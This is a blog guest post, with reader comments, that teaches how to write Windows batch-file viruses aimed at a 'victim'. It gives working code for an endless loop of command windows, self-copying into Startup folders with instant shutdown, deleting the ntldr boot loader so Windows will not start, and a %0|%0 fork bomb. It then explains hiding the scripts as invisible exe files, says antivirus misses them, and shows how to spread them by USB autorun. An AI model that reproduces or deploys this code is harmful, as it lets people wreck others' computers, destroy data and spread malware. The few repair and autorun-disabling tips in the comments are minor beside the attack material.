Pin It

How to create Batch file viruses?


What are Batch Files ?

According to wikipedia a batch file is a text file containing a series of commands intended to be executed by the command interprete, In this article I will be telling you the basics of batch files clear and developing the approach towards coding your own viruses. Lets begin with a simple example ,


Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'



We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat




Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we run the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?

They can be used to delete the windows files, format data, steal information,consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now lets start with simple codes,

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.


1.


:x
start cmd.exe
goto x // infinite loop

This code will be opening command prompt screen infinite times , irritating victim and affecting performance.


2.  copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts .


Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

3. Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.



Lets make a batch file to  delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del C:\ntldr //delete ntldr file

After ruuning this batch file , system will not reboot and a normal victim would definitely install the windows again. 




4.%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows This is actually known as 'fork bomb'.



The viruses we just coded -: 




 


Note : Most of the batch viruses are simply undetectable by any anitiviruses
 
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:

1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.


Download this Batch To Exe coverter from here.
http://www.mediafire.com/?uhsc5tfkd5dbn65

 
After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.



 


You can use other options as per your requirement.

Spreading batch viruses through pen drive -:


Step 1. 

 
Open notepad and write 



[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf


Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.



About The Author

This is a guest post written by Aneesh M Makker. Aneesh M.Makker is an Ethical hacker from Malout, a town in Punjab.Click here to visit his Facebook Profile

Subscribe to our Newsletter and receive updates directly via email - Get Ethical hacking and security tips directly to your inbox. Alternatively you can Join our Hackers Community on Facebook , Google+ and Twitter .

At RHA Infosec we provide different types of Security Testing from small business sites to Corporate Sites. Click Here to know more about our complete list of services.

Subscribe to RHA


Enjoyed this article?
Subscribe to "Rafay Hacking Articles" and get daily updates in your inbox for free!


Tags:


Kindly Bookmark it and Share it with Friends:

19 comments :

Vinay on October 21, 2010 at 9:21 PM said...

I am new to your blog.Excellent batch tutorial ever read. how can we solve 'missing ntldr' problem without reinstalling windows . ?

Aneesh said...

Insert windows cd , go to REPAIR and copy ntldr file OR simply insert Hiren bootable disk and You will get 'Fix ntldr missing' option

Cheap SSL Certificates on October 22, 2010 at 5:15 AM said...

Very nicely described about batch file. I just say "wonderful" and very useful too so thanks for posting this post.

pratik on October 22, 2010 at 5:40 AM said...

n also plz tell the way to protect ourself from the same..
i mean if i'll plug the pendrive in my lappy then i'll also be get effected of the virus

Rahul on October 22, 2010 at 6:28 AM said...

Thanx for the tutorial. It really helped me for making small viruses. Plz can u tell me or post me some more batch commands to create viruses or other methods to create viruses. It will be really helpful if u do.
Plz post me on hacking.cracking.tricks@gmail.com

Hacking Tricks on October 22, 2010 at 8:54 AM said...

great tutorial thanks..include some more batch commands

Aneesh said...

Thanx guyz

@pratik
Disable your autorun feature . You can do this by editing windows registry.
@rahul
Search for the batch file viruses codes , learn about the commands used in codes and try to understand the logic rather than just doing copy paste.

Vinay on October 22, 2010 at 8:27 PM said...

Ya Hiren Bootable Cd gives that option , I will try to use. Thx

Kaito said...

@aneesh
If you give a man a fish, you feed him a day.
If you ask the man to learn how to fish, you feed him his life.

Anonymous said...

hey I was wondering does this the above batch works for all versions of windows? e.g win7, win vista

Anonymous said...

hey , please write all commands so that i could copy

bothsider on January 15, 2011 at 2:30 PM said...

There are lots of programs to comple bat2exe, why have you named only one of the? I used Dr.Batcher (http://www.drbatcher.com ) to compile BAT to EXE, it works great.

Anonymous said...

his suggested bat to exe compiler was probably the only one he knows of that can set invisibility mode

Marwan said...

one of the most brilliant articles I have ever read...thanks

Anonymous said...

How to remove fork bomb virus, i have the same condition to my task manager, when i start my computer every time, any virus creates a large number of processes very quickly in order to saturate the process table of windows.
What should i do, Please Help me !

Dhiarya said...

hey dude for enerting my batch virus in pen drive I know what is autorun.inf but wat to put in anything.bat

Anonymous said...

Real trojan code

Anonymous said...

I think your tip's are cool

Anonymous said...

cool bro

Dare to ask? :)

Blog Archive

 

Recent Comments

About

Rafay Baloch is an Independent security researcher, Internet marketer, Entrepreneur and a SEO consultant, He is the founder of RHA blog and multiple other blogs. Rafay got famous after finding a Remote Code Execution bug inside PayPal for which PayPal awarded him a sum of 10,000$ Read More..

Join In!

RHA © 2013. All Rights Reserved.